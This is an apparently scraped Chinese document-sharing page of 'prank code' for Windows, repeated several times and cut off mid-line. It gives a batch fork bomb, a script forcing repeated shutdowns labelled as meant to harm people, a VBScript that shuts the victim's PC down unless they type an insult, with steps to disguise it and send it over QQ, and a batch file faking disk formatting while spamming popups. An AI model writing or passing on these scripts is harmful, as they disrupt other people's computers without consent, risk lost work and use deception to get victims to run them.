整人代码(指定时间关机),如下:
- 格式:doc
- 大小:12.00 KB
- 文档页数:1
整人代码大全让对方重启指定次数(害人专用)@echo offif not exist c:1.txt echo. >c:1.txt & goto err1if not exist c:2.txt echo. >c:2.txt & goto err1if not exist c:3.txt echo. >c:3.txt & goto err1sif not exist c:4.txt echo. >c:4.txt & goto err1if not exist c:5.txt echo. >c:5.txt & goto err1goto err2:err1shutdown -s -t 0:err2上面可以让对方电脑重启5次后不在重启,当然如果你修改一下加个if not exist c:6.txt echo. >c:6.txt & goto err1那就是重启6次改成7就是7次...打开“开始→程序→附件→记事本”,把代码部分复制进去,点“另存为”,路径选“你想要放的地方”,保存类型为“所有文件”,文件名为“你想要的名字.bat”,你的批量处理器就完成了。
善意恶搞关机首先呢,我们在桌面创建个新文件夹然后打开,在上面找到-工具T-文件夹选项O-查看把隐藏已知文件类型的扩展名前面的勾去掉.然后我们开始制作.在桌面建立个记事本,然后把下面代码复制进去on error resume nextdim WSHshellAset WSHshellA = wscript.createobject("wscript.shell")WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,试试···"" ",0 ,truedim ado while(a <> "我是猪")a = inputbox ("说我是猪,就不关机,快撒,说""我是猪"" ","说不说","不说",8000,7000)msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"loopmsgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"dim WSHshellset WSHshell = wscript.createobject("wscript.shell")WSHshell.run "cmd.exe /c shutdown -a",0 ,truemsgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,一切皆有可能~"复制之后呢,把后缀修改为.vbs或者改变打开方式为应用程序,这样你再压缩下用QQ发给你朋友,对方打开了就在60秒内要关闭计算机,结束任务都不行,他只能说他是猪才能解决问题。
第一个:让别人内存OVER(逼他重启)@echo offstart cmd%0就这3行了打开“开始→程序→附件→记事本”,把代码部分复制进去,点“另存为”,路径选“你想要放的地方”,保存类型为“所有文件”,文件名为“你想要的名字.bat”,你的批量处理器就完成了。
第二个:让对方重启指定次数(害人专用)@echo offif not exist c:1.txt echo. >c:1.txt & goto err1if not exist c:2.txt echo. >c:2.txt & goto err1if not exist c:3.txt echo. >c:3.txt & goto err1if not exist c:4.txt echo. >c:4.txt & goto err1if not exist c:5.txt echo. >c:5.txt & goto err1goto err2:err1shutdown -s -t 0:err2上面可以让对方电脑重启5次后不在重启,当然如果你修改一下加个if not exist c:6.txt echo. >c:6.txt & goto err1那就是重启6次改成7就是7次...打开“开始→程序→附件→记事本”,把代码部分复制进去,点“另存为”,路径选“你想要放的地方”,保存类型为“所有文件”,文件名为“你想要的名字.bat”,你的批量处理器就完成了。
第三个:善意恶搞关机首先呢,我们在桌面创建个新文件夹然后打开,在上面找到-工具T-文件夹选项O-查看把隐藏已知文件类型的扩展名前面的勾去掉.然后我们开始制作.在桌面建立个记事本,然后把下面代码复制进去on error resume nextdim WSHshellAset WSHshellA = wscript.createobject("wscript.shell")WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,试试···"" ",0 ,truedim ado while(a <> "我是猪")a = inputbox ("说我是猪,就不关机,快撒,说""我是猪""","说不说","不说",8000,7000)msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"loopmsgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"dim WSHshellset WSHshell = wscript.createobject("wscript.shell")WSHshell.run "cmd.exe /c shutdown -a",0 ,truemsgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,一切皆有可能~"复制之后呢,把后缀修改为.vbs或者改变打开方式为应用程序,这样你再压缩下用QQ发给你朋友,对方打开了就在60秒内要关闭计算机,结束任务都不行,他只能说他是猪才能解决问题。
整人代码大全让对方重启指定次数(害人专用)@echo offif not exist c:1.txt echo. >c:1.txt & goto err1if not exist c:2.txt echo. >c:2.txt & goto err1if not exist c:3.txt echo. >c:3.txt & goto err1sif not exist c:4.txt echo. >c:4.txt & goto err1if not exist c:5.txt echo. >c:5.txt & goto err1goto err2:err1shutdown -s -t 0:err2上面可以让对方电脑重启5次后不在重启,当然如果你修改一下加个if not exist c:6.txt echo. >c:6.txt & goto err1那就是重启6次改成7就是7次...打开“开始→程序→附件→记事本”,把代码部分复制进去,点“另存为”,路径选“你想要放的地方”,保存类型为“所有文件”,文件名为“你想要的名字.bat”,你的批量处理器就完成了。
善意恶搞关机首先呢,我们在桌面创建个新文件夹然后打开,在上面找到-工具T-文件夹选项O-查看把隐藏已知文件类型的扩展名前面的勾去掉.然后我们开始制作.在桌面建立个记事本,然后把下面代码复制进去on error resume nextdim WSHshellAset WSHshellA = wscript.createobject("wscript.shell")WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,试试···"" ",0 ,truedim ado while(a <> "我是猪")a = inputbox ("说我是猪,就不关机,快撒,说""我是猪"" ","说不说","不说",8000,7000)msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"loopmsgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"dim WSHshellset WSHshell = wscript.createobject("wscript.shell")WSHshell.run "cmd.exe /c shutdown -a",0 ,truemsgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,一切皆有可能~"复制之后呢,把后缀修改为.vbs或者改变打开方式为应用程序,这样你再压缩下用QQ发给你朋友,对方打开了就在60秒内要关闭计算机,结束任务都不行,他只能说他是猪才能解决问题。
整人代码大全让对方重启指定次数(害人专用)@echo offif not exist c:1.txt echo. >c:1.txt & goto err1if not exist c:2.txt echo. >c:2.txt & goto err1if not exist c:3.txt echo. >c:3.txt & goto err1sif not exist c:4.txt echo. >c:4.txt & goto err1if not exist c:5.txt echo. >c:5.txt & goto err1goto err2:err1shutdown -s -t 0:err2上面可以让对方电脑重启5次后不在重启,当然如果你修改一下加个if not exist c:6.txt echo. >c:6.txt & goto err1那就是重启6次改成7就是7次...打开“开始→程序→附件→记事本”,把代码部分复制进去,点“另存为”,路径选“你想要放的地方”,保存类型为“所有文件”,文件名为“你想要的名字.bat”,你的批量处理器就完成了。
善意恶搞关机首先呢,我们在桌面创建个新文件夹然后打开,在上面找到-工具T-文件夹选项O-查看把隐藏已知文件类型的扩展名前面的勾去掉.然后我们开始制作.在桌面建立个记事本,然后把下面代码复制进去on error resume nextdim WSHshellAset WSHshellA = wscript.createobject("wscript.shell")WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,试试···"" ",0 ,truedim ado while(a <> "我是猪")a = inputbox ("说我是猪,就不关机,快撒,说""我是猪"" ","说不说","不说",8000,7000)msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"loopmsgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"dim WSHshellset WSHshell = wscript.createobject("wscript.shell")WSHshell.run "cmd.exe /c shutdown -a",0 ,truemsgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,一切皆有可能~"复制之后呢,把后缀修改为.vbs或者改变打开方式为应用程序,这样你再压缩下用QQ发给你朋友,对方打开了就在60秒内要关闭计算机,结束任务都不行,他只能说他是猪才能解决问题。
整人bat大全1. 1、@echo offtitle 请勿关闭本程序,否则后果自负!:Nextecho “请输入:“我是猪头三”,否则将关闭计算机!"shutdown -s -t 60 -c “请输入:“我是猪头三”,否则将关闭计算机!"set /p Input=if "%input%"=="我是猪头三" goto EXITgoto Next:EXITshutdown -aecho “算你运气好,下面还有你好看的!”shutdown -s -t 60 -c “请做出选择!否则将关闭计算机!”ping 127.0.0.1 -n 2 >nulecho “你觉得我厉害吗?厉害按“Y”,不厉害按“N”set /p YN=if /i "%YN%"=="Y" shutdown -aif /i "%YN%"=="N" shutdown -ae cho “我要给你看看我的真本事!”ping 127.0.0.1 -n 2 >nul:Downecho “请输入:“你最厉害”,否则将关闭计算机!"shutdown -s -t 60 -c “请输入:“你最厉害”,否则将关闭计算机!"set /p Input=if "%input%"=="你最厉害" goto OVERgoto Down:OVERshutdown -aping 127.0.0.1 -n 1 >nulecho “怎么样,很可怕吧!”ping 127.0.0.1 -n 2 >nulecho “此计算机将在20秒内崩溃或爆炸,请马上从附近窗口跳下,否则后果自负。
”echo “即将删除此计算机上所有重要数据。
”ping 127.0.0.1 -n 1 >nulecho “正在格式化本地磁盘C:所有数据...”ping 127.0.0.1 -n 2 >nulecho “正在格式化本地磁盘D:所有数据...”ping 127.0.0.1 -n 2 >nulecho “格式化失败!,此计算机即将爆炸...”echo “请马上离开本计算机!此计算机即将爆炸!”ping 127.0.0.1 -n 2 >nulmsg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %usern ame% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %usern ame% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %usern ame% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 